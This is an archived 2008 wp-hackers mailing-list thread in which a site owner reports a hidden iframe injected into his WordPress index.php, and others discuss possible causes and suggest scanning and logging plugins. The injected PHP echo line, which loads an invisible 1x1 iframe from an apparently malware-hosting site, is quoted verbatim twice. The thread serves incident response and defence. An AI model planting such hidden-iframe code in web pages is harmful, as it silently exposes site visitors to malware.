[wp-hackers] Re: XSS vuln in wordpress 2.7 ?

Mon Dec 22 22:32:26 GMT 2008

madalin - 

I'm going to suggest 2 plugins for you to look into using:

WordPress Exploit Scanner (Donncha O Caoimh):
http://wordpress.org/extend/plugins/exploit-scanner/

postlogger for WordPress:
http://www.village-idiot.org/archives/2008/04/16/postlogger-for-wordpress/

I run postlogger, and it's very interesting the things that it logs that 
regular access logs don't. Not saying it would have caught this 
intruder, but you might find other interesting things going on that 
you're not aware of that you can block.

The Exploit Scanner might let you know if there's a vulnerability in a 
plugin or anywhere else in your WordPress install.

Kim

-------------------------

baker wrote:
> Just to chime in on the fun, you're not the only one as a quick google
> search pulls a lot of people with similar posts.
>
> http://www.networksolutions.com/whois-search/thedeadpit.com
>
> As well shows the (supposed) owner is in Estonia, which oddly enough
> I've seen a lot of failed hack attempts on my site coming from Estonia
> (I think, maybe it was algeria?)
>
> Do you have mod_security enabled? No luck on pulling down the
> offender's IP, and the site itself seems to do nothing but host a
> virus...
>
> Best of luck turning this around...
>
> -kb
>   
>> ------------------------------
>>
>> Message: 7
>> Date: Mon, 22 Dec 2008 20:39:49 +0200
>> From: madalin <niladam at gmail.com>
>> Subject: Re: [wp-hackers] XSS vuln in wordpress 2.7 ?
>> To: wp-hackers at lists.automattic.com
>> Message-ID:
>>        <df809b110812221039y29f116f1k5238dfb209d3f30a at mail.gmail.com>
>> Content-Type: text/plain; charset=UTF-8
>>
>> Yes that's exactly what i am saying. Here is my index.php:
>>
>> <?php
>> /**
>>  * Front to the WordPress application. This file doesn't do anything, but loads
>>  * wp-blog-header.php which does and tells WordPress to load the theme.
>>  *
>>  * @package WordPress
>>  */
>>
>> /**
>>  * Tells WordPress to load the WordPress theme and output it.
>>  *
>>  * @var bool
>>  */
>> define('WP_USE_THEMES', true);
>>
>> /** Loads the WordPress Environment and Template */
>> require('./wp-blog-header.php');
>>
>> // echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>> ?>
>>
>> I've commented the line so i can keep it for future investigations.
>>
>> Our password have NOT been compromised as the only logins are from my
>> host and my friend's host. It could be an older version of a plugin
>> tough.
>>
>> However, i had to report this as maybe someone will encounter the same
>> problem or so.
>>
>> Thanks.
>>
>> On Mon, Dec 22, 2008 at 8:36 PM, Stephen Rider
>> <wp-hackers at striderweb.com> wrote:
>>     
>>> Well, wait.  he said:  "i found [it in] my blog's index.php (not theme's
>>> index.php)"
>>>
>>> Does this mean it shows up in the final rendered page, but not in the
>>> theme's file?  In that case, it's being added dynamically.  The link is not
>>> written in the theme.
>>>
>>> Just trying to clarify.  I'm no security guru... (IANASG)
>>>
>>> Stephen
>>>
>>> On Dec 22, 2008, at 11:33 AM, Joost de Valk wrote:
>>>       
>>>> If the file is writable for the webserver and file access is enabled on
>>>> the webserver: yes.
>>>>         
>>>> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>>>>         
>>>>> Wow. That's nasty, and malicious. Could a plugin do that?
>>>>>
>>>>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>>>>           
>>>>>> For some reason i found my blog's index.php (not theme's index.php)
>>>>>> with the following piece of code right before the ?>
>>>>>>
>>>>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>>>>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>>>>>
>>>>>> I tried looking at the logs. No luck. The file's permisions look like
>>>>>> this:
>>>>>>
>>>>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50
>>>>>> /home/madalin/www/index.php